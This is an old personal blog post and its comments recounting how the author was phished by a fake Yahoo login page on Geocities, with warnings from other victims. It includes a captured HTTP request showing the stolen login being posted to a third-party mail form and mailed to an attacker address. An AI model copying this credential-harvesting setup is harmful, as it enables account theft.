0xCAFEFEED

Sep 14 2006

Got Phished :(

Tags: web — Rajiv @ 9:01 am GMT-0700

I booted my laptop early this morning to get my daily dose of Google alerts. Navigating through the alerts I ended up at: The Museum of Modern Betas and browsing through its entries I chanced upon Google’s firefox extension for detecting phishing: Safe Browsing. While I was going through their site, I noticed the yahoo notification window show “Deeps is now online” and I was thinking to myself “What is this guy doing online so early in the morn?” (And may I ask what are YOU doing online?!) Installing Google SafeBrowsing seems to be fraught with its own problems. The SafeBrowsing home page says that it can be installed as part of google toolbar only. Antitrust I say! Some sites say the download is available only in US. Further googling revealed the URL: http://dl.google.com/firefox/google-safebrowsing.xpi

While I was installing the plugin (firefox waits for a couple of seconds before enabling the install button … i wonder why?!), I see a message from deeps:

Deeps: http://www.geocities.com/junebug585

…and he logs out. I promptly clicked on the link which showed the page:

“Hmmm … password” I say. I ping deeps …”Dood … it’s asking for password”. No response. Being a stickler for online security (ask my wife on how i nag her into setting a different password for each site and make sure she does not note down her passwords anywhere!) I think to myself… “Hey! This could be a phishing site!” (what with me looking at Google SafeBrowsing site just a few mins ago). “Very well”, I tell myself, “… the url is Yahoo! Geocities, the logos and the layout looks ok … Why would deep try to phish my yahoo account details … what the hell .. let’s try to login”. Key in the user id pass nothing happens. Back to Yahoo home page. “D’oh! Have I been phished?!” with this nagging doubt go have a shower … come back… notice deeps has replied to my message:

Deeps: what login?
Deeps: did u a get any message from me?
Deeps: i did not send it..

“Oh God! I have been phished!! Change the password quickly.” Chirpy wifey: “Breakfast time!” “Oh God! Imagine after all my taunts … I’ve been phished … how am I going to tell her this?! Have I really been phished?!” So I decide to go back to the site and verify. LiveHTTPHeaders shows:

http://www2.fiberbit.net/form/mailto.cgi
POST /form/mailto.cgi HTTP/1.1
Host: www2.fiberbit.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.geocities.com/junebug585/?200614
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Mail_From=GOD&Mail_To=jawsy1%40gmail.com&Mail_Subject=Gift&Next_Page=http%3A%2F%2Fwww.yahoo.com
&.pd=fpctx_ver%253d0&login=asdf&passwd=asdf

HTTP/1.x 302 Moved Temporarily
Date: Thu, 14 Sep 2006 04:01:30 GMT
Server: Apache/1.3.26 (Unix) mod_perl/1.26
Location: http://www.yahoo.com
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from downloads.pramati.com
X-Cache-Lookup: MISS from downloads.pramati.com:3128
Connection: close

“Oh no! I really have been phished! Bugger has mailed my yahoo password to himself!! Change the password … change the password … change the password!”. Wifey, annoyed after waiting for me at the b’fast table: “Wot’chu doin buster?!” … where do I hide my face now?!

The phisher is not Deeps… some one phished his id and sent me the message. Maybe it is not even junebug585 whose geocities site was used to phish for my account details … maybe that id was also phished and misused. Maybe it is not even jawsy1@gmail.com where my userid/pass have been mailed … maybe that id/pass also have been phished?! I wonder who all will receive a message from my id now and be phished!

Imagine the coincidence, I am finicky abt internet security, I was just checking out Google’s SafeBrowsing and I got phished! “I took a chance typing my yahoo id, surely I wouldn’t have taken a chance if the site asked for my bank account-nos/user-ids” I rationalize. But still … what if the phisher downloaded all my password reminder mails from my yahoo mailbox??!!

All the best dad!

… now the painful part of reporting abuse to yahoo and gmail …

Update: Looks like I am not the first! … and looks like google pages are also being used for phishing. Google: yahoo geocities phishing

Update 1: Yahoo!’s soln for phishing?! (via deeps):

———- Forwarded message ———-
From: Kalyan K Kumar
Date: Sep 14, 2006 11:04 AM
Subject: phishing
To: sammelan

keep an eye on those yahoo login look alike geocities links. don’t enter
yahoo password anywhere
other than login.yahoo.com
you can setup a sign in seal to protect partly.

http://protect.login.yahoo.com/

Share:

Comments (8)

No trackbacks

8 comments

Sachin
September 14th, 2006
10:01 pm GMT-0700
Comment #1

Very Interesting…

And welcome back!
Rupesh Kumar
September 20th, 2006
12:10 am GMT-0700
Comment #2

wow ! interesting.. still i can’t believe YOU got fished 😀
Anonymous
October 26th, 2006
6:25 pm GMT-0700
Comment #3

It’s all very real for sure… I found your comments quite relevant as I received a message from a friend with a link which I clicked same deal geocities page with Yahoo content, Duh… I entered my Yahoo info and lots of script errors and eventually a 404 not found came up. The hair on the back of my neck stood up and I immediately closed my browser emptied the temp files and then went and changed my Yahoo PW. I asked my friend if she sent me the link and her reply didn’t make sense and I rcvd another offline message today with the same link, needless to say I sent her the info back, looked at the html code on the link for what didn’t look right (I don’t know HTML but am computer savvy) and sure enough I found “www2.fiberbit.net” suspiciously located and decided to do a search where I found your comments… Thanks for sharing, as I was beginning to think I was being overly paranoid! etherialoneinnc
Anonymous
January 21st, 2007
3:09 am GMT-0700
Comment #4

Hi there,

Here is the message that I sent to my group memmber using my mothers yahoo ID.

Dee No Longer Controls This Group !! ( I was phished by “mysuperheroine”)

I worked very hard on this group, and it was a success; However all
is not lost, you could join me in rebuilding an even better bbw101 !!
http://www.groups.yahoo.com/group/bbw101_

This group( http://www.groups.yahoo.com/group/bbw101)has no control
since my password was stolen. Memberships had to be approved by me,
therefore this group will never reach it’s potential. Thankfully, my
mother joined this group, I’m using her ID to tell you about the
intrusion. If mysuperheroine/rakhinrahbin, or who ever she may be by
now, finds out… she may ban me from my own group. This person
chats like your average good girlfriend in order to gain trust,and
then she strikes! You’ll never know what hit ya! She often speaks of
a stalker bf that she is terrified of, and how this guy can even see
her IM’s (raise an eyebrow?). The next thing I knew, she sent me a
link to see her “new pictures,” and there was the infamous spoofed
yahoo login page! I didn’t pay attention, and signed in….. sending
this cyber criminal my password to all of my personal yahoo
everything! I was hurt, but I would like to move on with my members.
Please read on to learn more about “phishing,” and how to protect
yourself.

This lady… or man for that matter was attracted to me, and wanted to introduce me to her brother. “She” even sent me a picture of the brother, which I now believe is her/him. Sounds confusing huh?
Anonymous
February 14th, 2007
6:14 pm GMT-0700
Comment #5

I feel what you are saying about being (“PHISHED.”) I was phished today. Now I have to make another myspace page. I hate the fact of that. I only looked up phish in GOOGLE to see how to prevent getting phished. How do you get phished? That still diddn’t answer my question.

comment left on Febuary 14, 2007 at 8:10p.m. HAPPY VALENTINE’S DAY
Asgeir S. Nilsen
May 9th, 2007
12:24 pm GMT-0700
Comment #6

I would recommend that you start to use a password generating bookmarklet for your web passwords. A good implementation is at http://labs.zarate.org/passwd/. What this does is simply to generate (via javascript running from a toolbar bookmark button) a password based on a master password you’re prompted for, and the site’s host name.

This scheme ensures different passwords for different sites, and renders it impossible for a phising site to get a correct password (since it’s host name would differ).

If you develop web applications accepting passwords, I would recommend you to read my blog post Password authentication without revealing your password, which describes a scheme for hashing the password in the browser before its submitted to the server.
MARC
August 13th, 2007
1:10 pm GMT-0700
Comment #7

its a fucking looser, me i have see that, this fucking looser, i have really spammed this fake website phishing, sorry for my bad english, im french its for that
izulthea
March 29th, 2009
6:23 pm GMT-0700
Comment #8

Hahahaaa…funny but dangerous! BE CAREFUL Bro!!

Got Phished :(

No trackbacks

8 comments

Leave a Reply